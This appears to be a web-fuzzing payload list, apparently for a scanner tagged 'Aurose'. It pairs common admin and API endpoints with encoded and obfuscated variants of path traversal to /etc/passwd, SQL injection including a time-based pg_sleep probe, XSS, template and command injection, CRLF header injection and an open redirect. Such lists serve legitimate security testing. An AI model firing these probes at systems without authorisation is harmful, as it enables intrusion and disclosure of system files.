/admin
/login
/dashboard
/api
/api/v1
/status
/debug
/health
/metrics
/api/status
/api/debug
/api/api
/api?test=1
/swagger
/openapi.json
/graphql
/graphiql
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2Fadmin
%2Flogin
%2Fdashboard
%2Fapi
%2Fapi%2Fv1
%2Fstatus
%2Fdebug
%2Fhealth
%2Fmetrics
%2Fapi%2Fstatus
%2Fapi%2Fdebug
%2Fapi%2Fapi
%2Fapi%3Ftest%3D1
%2Fswagger
%2Fopenapi.json
%2Fgraphql
%2Fgraphiql
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
/ADMIN
/LOGIN
/DASHBOARD
/API
/API/V1
/STATUS
/DEBUG
/HEALTH
/METRICS
/API/STATUS
/API/DEBUG
/API/API
/API?TEST=1
/SWAGGER
/OPENAPI.JSON
/GRAPHQL
/GRAPHIQL
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
/swagger.json
%2Fswagger.json
%252Fswagger.json
/SWAGGER.JSON
/swagger.json?aurose=1
/swagger.json&aurose=1
/swagger.json.bak
/swagger.json.old
%252Fopenapi.json
/openapi.json?aurose=1
/openapi.json&aurose=1
/openapi.json.bak
/openapi.json.old
/swagger-ui/
%2Fswagger-ui%2F
%252Fswagger-ui%252F
/SWAGGER-UI/
/swagger-ui/?aurose=1
/swagger-ui/&aurose=1
/swagger-ui/.bak
/swagger-ui/.old
/api-docs
%2Fapi-docs
%252Fapi-docs
/API-DOCS
/api-docs?aurose=1
/api-docs&aurose=1
/api-docs.bak
/api-docs.old
/v1/users
%2Fv1%2Fusers
%252Fv1%252Fusers
/V1/USERS
/v1/users?aurose=1
/v1/users&aurose=1
/v1/users.bak
/v1/users.old
/v1/admin
%2Fv1%2Fadmin
%252Fv1%252Fadmin
/V1/ADMIN
/v1/admin?aurose=1
/v1/admin&aurose=1
/v1/admin.bak
/v1/admin.old
%252Fgraphql
/graphql?aurose=1
/graphql&aurose=1
/graphql.bak
/graphql.old
/actuator/health
%2Factuator%2Fhealth
%252Factuator%252Fhealth
/ACTUATOR/HEALTH
/actuator/health?aurose=1
/actuator/health&aurose=1
/actuator/health.bak
/actuator/health.old
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`ID`
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
/swagger.json::var0
%2Fswagger.json::v0
/api/probe/0
/openapi.json::var1
%2Fopenapi.json::v1
/api/probe/1
/swagger-ui/::var2
%2Fswagger-ui%2F::v2
/api/probe/2
/api-docs::var3
%2Fapi-docs::v3
/api/probe/3
/v1/users::var4
%2Fv1%2Fusers::v4
/api/probe/4
/v1/admin::var5
%2Fv1%2Fadmin::v5
/api/probe/5
/graphql::var6
%2Fgraphql::v6
/api/probe/6
/actuator/health::var7
%2Factuator%2Fhealth::v7
/api/probe/7
